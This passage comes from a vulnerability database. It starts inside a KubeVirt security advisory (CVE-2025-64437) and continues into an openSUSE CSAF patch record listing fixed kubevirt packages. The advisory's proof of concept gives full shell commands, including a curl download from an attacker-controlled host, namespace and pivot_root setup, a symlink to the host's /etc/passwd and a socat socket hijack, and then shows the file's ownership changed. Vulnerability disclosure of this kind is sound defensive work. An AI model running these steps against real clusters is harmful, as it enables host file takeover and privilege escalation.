article](https://blog.quarkslab.com/digging-into-linux-namespaces-part-2.html), where the attacker constructs an isolated environment solely using Linux namespaces and an augmented Alpine container root file system.\n\n```bash\n# Download an container file system from an attacker-controlled location\nqemu-compromised@minikube:~$ curl http://host.minikube.internal:13337/augmented-alpine.tar -o augmented-alpine.tar\n# Create a directory and extract the file system in it\nqemu-compromised@minikube:~$ mkdir rootfs_alpine \u0026\u0026 tar -xf augmented-alpine.tar -C rootfs_alpine\n# Create a MOUNT and remapped USER namespace environment and execute a shell process in it\nqemu-compromised@minikube:~$ unshare --user --map-root-user --mount sh\n# Bind-mount the alpine rootfs, move into it and create a directory for the old rootfs.\n# The user is root in its new USER namesapce\nroot@minikube:~$ mount --bind rootfs_alpine rootfs_alpine \u0026\u0026 cd rootfs_alpine \u0026\u0026 mkdir hostfs_root\n# Swap the current root of the process and store the old one within a directory\nroot@minikube:~$ pivot_root . hostfs_root \nroot@minikube:~$ export PATH=/bin:/usr/bin:/usr/sbin\n# Create the directory with the same path as the PVC mounted within the `virt-launcher`. In it `virt-handler` will search for a `disk.img` file associated with a volume mount\nroot@minikube:~$ PVC_PATH=\"/var/run/kubevirt-private/vmi-disks/corrupted-pvc\" \u0026\u0026 \\\nmkdir -p \"${PVC_PATH}\" \u0026\u0026 \\\ncd \"${PVC_PATH}\"\n# Create the `disk.img` symlink pointing to `/etc/passwd` of the host in the old root mount directory\nroot@minikube:~$ ln -sf ../../../../../../../../../../../../hostfs_root/etc/passwd disk.img\n# Create the socket wich will confuse the isolator detector and start listening on it\nroot@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -\n```\n\n\nAfter the environment is set, the `launcher-sock` in the `virt-launcher` container should be replaced with a symlink to `../../../../../../../../../proc/2245509/root/tmp/bad.sock` (2245509 is the PID of the above isolated shell process). This should be done, however, in a the right moment. For this demonstration, it was decided to trigger the bug while leveraging a race condition when creating or updating a VMI:\n\n```go\n//pkg/virt-handler/vm.go\n\nfunc (c *VirtualMachineController) vmUpdateHelperDefault(origVMI *v1.VirtualMachineInstance, domainExists bool) error {\n // ...\n //!!! MK: the change should happen here before executing the below line !!!\n isolationRes, err := c.podIsolationDetector.Detect(vmi)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(failedDetectIsolationFmt, err)\n\t\t}\n\t\tvirtLauncherRootMount, err := isolationRes.MountRoot()\n\t\tif err != nil {\n\t\t\treturn err\n\t\t}\n\t\t// ...\n\n\t\t// initialize disks images for empty PVC\n\t\thostDiskCreator := hostdisk.NewHostDiskCreator(c.recorder, lessPVCSpaceToleration, minimumPVCReserveBytes, virtLauncherRootMount)\n\t\t// MK: here the permissions are changed\n\t\terr = hostDiskCreator.Create(vmi)\n\t\tif err != nil {\n\t\t\treturn fmt.Errorf(\"preparing host-disks failed: %v\", err)\n\t\t}\n // ...\n\n```\n\nThe manifest of the #acr(\"vmi\") which is going to trigger the bug is:\n\n```yaml\n# The PVC will be used for the `disk.img` related bug\napiVersion: v1\nkind: PersistentVolumeClaim\nmetadata:\n name: corrupted-pvc\nspec:\n accessModes:\n - ReadWriteMany\n resources:\n requests:\n storage: 500Mi\n---\napiVersion: kubevirt.io/v1\nkind: VirtualMachineInstance\nmetadata:\n labels:\n name: launcher-symlink-confusion\nspec:\n domain:\n devices:\n disks:\n - name: containerdisk\n disk:\n bus: virtio\n - name: corrupted-pvc\n disk:\n bus: virtio\n - name: cloudinitdisk\n disk:\n bus: virtio\n resources:\n requests:\n memory: 1024M\n terminationGracePeriodSeconds: 0\n volumes:\n - name: containerdisk\n containerDisk:\n image: quay.io/kubevirt/cirros-container-disk-demo\n - name: corrupted-pvc\n persistentVolumeClaim:\n claimName: corrupted-pvc\n - name: cloudinitdisk \n cloudInitNoCloud:\n userDataBase64: SGkuXG4=\n```\n\nJust before the line is executed, the attacker should replace the `launcher-sock` with a symlink to the `bad.sock` controlled by the isolated process:\n\n```bash\n# the namespaced process controlled by the attacker has pid=2245509\nqemu-compromised@minikube:~$ p=$(pgrep -af \"/usr/bin/virt-launcher\" | grep -v virt-launcher-monitor | awk \u0027{print $1}\u0027) \u0026\u0026 ln -sf ../../../../../../../../../proc/2245509/root/tmp/bad.sock /proc/$p/root/var/run/kubevirt/sockets/launcher-sock\n```\n\n\nUpon successful exploitation, `virt-launcher` connects to the attacker controlled socket, misinterprets the root mount and changes the permissions of the host\u0027s `/etc/passwd` file:\n\n\n```bash\n# `virt-launcher` connects successfully\nroot@minikube:~$ socat -d -d UNIX-LISTEN:/tmp/bad.sock,fork,reuseaddr -\n...\n2025/05/27 17:17:35 socat[2245509] N accepting connection from AF=1 \"\u003canon\u003e\" on AF=1 \"/tmp/bad.sock\"\n2025/05/27 17:17:35 socat[2245509] N forked off child process 2252010\n2025/05/27 17:17:35 socat[2245509] N listening on AF=1 \"/tmp/bad.sock\"\n2025/05/27 17:17:35 socat[2252010] N reading from and writing to stdio\n2025/05/27 17:17:35 socat[2252010] N starting data transfer loop with FDs [6,6] and [0,1]\nPRI * HTTP/2.0\n```\n\n```bash\nadmin@minikube:~$ ls -al /etc/passwd\n-rw-r--r--. 1 compromised-qemu systemd-resolve 1337 May 23 13:19 /etc/passwd\n\nadmin@minikube:~$ cat /etc/passwd\nroot:x:0:0:root:/root:/bin/bash\ndaemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\nbin:x:2:2:bin:/bin:/usr/sbin/nologin\nsys:x:3:3:sys:/dev:/usr/sbin/nologin\nsync:x:4:65534:sync:/bin:/bin/sync\ngames:x:5:60:games:/usr/games:/usr/sbin/nologin\nman:x:6:12:man:/var/cache/man:/usr/sbin/nologin\nlp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin\nmail:x:8:8:mail:/var/mail:/usr/sbin/nologin\nnews:x:9:9:news:/var/spool/news:/usr/sbin/nologin\nuucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin\nproxy:x:13:13:proxy:/bin:/usr/sbin/nologin\nwww-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\nbackup:x:34:34:backup:/var/backups:/usr/sbin/nologin\nlist:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin\nirc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin\ngnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin\nnobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin\n_apt:x:100:65534::/nonexistent:/usr/sbin/nologin\n_rpc:x:101:65534::/run/rpcbind:/usr/sbin/nologin\nsystemd-network:x:102:106:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin\nsystemd-resolve:x:103:107:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin\nstatd:x:104:65534::/var/lib/nfs:/usr/sbin/nologin\nsshd:x:105:65534::/run/sshd:/usr/sbin/nologin\ndocker:x:1000:999:,,,:/home/docker:/bin/bash\ncompromised-qemu:x:107:107::/home/compromised-qemu:/bin/bash\n```\n\nThe attacker controlling an unprivileged user can now update the contents of the file.\n\n### Impact\n_What kind of vulnerability is it? Who is impacted?_\n\nThis oversight can be exploited, for example, to change the ownership of arbitrary files on the host node to the unprivileged user with UID `107` (the same user used by `virt-launcher`) thus, compromising the CIA (Confidentiality, Integrity and Availability) of data on the host.",
"id": "GHSA-2r4r-5x78-mvqf",
"modified": "2025-11-17T21:41:52Z",
"published": "2025-11-06T23:36:39Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/security/advisories/GHSA-2r4r-5x78-mvqf"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64437"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/3ce9f41c54d04a65f10b23a46771391c00659afb"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/8644dbe0d04784b0bfa8395b91ecbd6001f88f6b"
},
{
"type": "WEB",
"url": "https://github.com/kubevirt/kubevirt/commit/f59ca63133f25de8fceb3e2a0e5cc0b7bdb6a265"
},
{
"type": "PACKAGE",
"url": "https://github.com/kubevirt/kubevirt"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "KubeVirt Isolation Detection Flaw Allows Arbitrary File Permission Changes"
}
OPENSUSE-SU-2025:15772-1
Vulnerability from csaf_opensuse - Published: 2025-11-26 00:00 - Updated: 2025-11-26 00:00Summary
kubevirt-container-disk-1.6.3-1.1 on GA media
Notes
Title of the patch
kubevirt-container-disk-1.6.3-1.1 on GA media
Description of the patch
These are all security issues fixed in the kubevirt-container-disk-1.6.3-1.1 package on the GA media of openSUSE Tumbleweed.
Patchnames
openSUSE-Tumbleweed-2025-15772
Terms of use
CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).
{
"document": {
"aggregate_severity": {
"namespace": "https://www.suse.com/support/security/rating/",
"text": "moderate"
},
"category": "csaf_security_advisory",
"csaf_version": "2.0",
"distribution": {
"text": "Copyright 2024 SUSE LLC. All rights reserved.",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en",
"notes": [
{
"category": "summary",
"text": "kubevirt-container-disk-1.6.3-1.1 on GA media",
"title": "Title of the patch"
},
{
"category": "description",
"text": "These are all security issues fixed in the kubevirt-container-disk-1.6.3-1.1 package on the GA media of openSUSE Tumbleweed.",
"title": "Description of the patch"
},
{
"category": "details",
"text": "openSUSE-Tumbleweed-2025-15772",
"title": "Patchnames"
},
{
"category": "legal_disclaimer",
"text": "CSAF 2.0 data is provided by SUSE under the Creative Commons License 4.0 with Attribution (CC-BY-4.0).",
"title": "Terms of use"
}
],
"publisher": {
"category": "vendor",
"contact_details": "https://www.suse.com/support/security/contact/",
"name": "SUSE Product Security Team",
"namespace": "https://www.suse.com/"
},
"references": [
{
"category": "external",
"summary": "SUSE ratings",
"url": "https://www.suse.com/support/security/rating/"
},
{
"category": "self",
"summary": "URL of this CSAF notice",
"url": "https://ftp.suse.com/pub/projects/security/csaf/opensuse-su-2025_15772-1.json"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-22872 page",
"url": "https://www.suse.com/security/cve/CVE-2025-22872/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64433 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64433/"
},
{
"category": "self",
"summary": "SUSE CVE CVE-2025-64437 page",
"url": "https://www.suse.com/security/cve/CVE-2025-64437/"
}
],
"title": "kubevirt-container-disk-1.6.3-1.1 on GA media",
"tracking": {
"current_release_date": "2025-11-26T00:00:00Z",
"generator": {
"date": "2025-11-26T00:00:00Z",
"engine": {
"name": "cve-database.git:bin/generate-csaf.pl",
"version": "1"
}
},
"id": "openSUSE-SU-2025:15772-1",
"initial_release_date": "2025-11-26T00:00:00Z",
"revision_history": [
{
"date": "2025-11-26T00:00:00Z",
"number": "1",
"summary": "Current version"
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.aarch64",
"product_id": "kubevirt-container-disk-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.aarch64",
"product_id": "kubevirt-manifests-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.aarch64",
"product_id": "kubevirt-tests-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-api-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.aarch64",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.aarch64",
"product_id": "kubevirt-virtctl-1.6.3-1.1.aarch64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.aarch64"
}
}
],
"category": "architecture",
"name": "aarch64"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-container-disk-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-manifests-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-tests-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-api-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.ppc64le",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.ppc64le",
"product_id": "kubevirt-virtctl-1.6.3-1.1.ppc64le"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.s390x",
"product_id": "kubevirt-container-disk-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.s390x",
"product_id": "kubevirt-manifests-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.s390x",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.s390x",
"product_id": "kubevirt-tests-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-api-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.s390x",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.s390x",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.s390x",
"product_id": "kubevirt-virtctl-1.6.3-1.1.s390x"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "kubevirt-container-disk-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-container-disk-1.6.3-1.1.x86_64",
"product_id": "kubevirt-container-disk-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-manifests-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-manifests-1.6.3-1.1.x86_64",
"product_id": "kubevirt-manifests-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"product_id": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64",
"product_id": "kubevirt-sidecar-shim-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-tests-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-tests-1.6.3-1.1.x86_64",
"product_id": "kubevirt-tests-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-api-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-api-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-api-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-controller-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-controller-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-controller-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-exportproxy-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-exportserver-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-handler-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-handler-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-handler-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-launcher-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-launcher-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virt-operator-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virt-operator-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virt-operator-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "kubevirt-virtctl-1.6.3-1.1.x86_64",
"product": {
"name": "kubevirt-virtctl-1.6.3-1.1.x86_64",
"product_id": "kubevirt-virtctl-1.6.3-1.1.x86_64"
}
},
{
"category": "product_version",
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64",
"product": {
"name": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64",
"product_id": "obs-service-kubevirt_containers_meta-1.6.3-1.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-container-disk-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-container-disk-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-container-disk-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-manifests-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-manifests-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-manifests-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.s390x"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-pr-helper-conf-1.6.3-1.1.x86_64"
},
"product_reference": "kubevirt-pr-helper-conf-1.6.3-1.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:kubevirt-sidecar-shim-1.6.3-1.1.aarch64"
},
"product_reference": "kubevirt-sidecar-shim-1.6.3-1.1.aarch64",
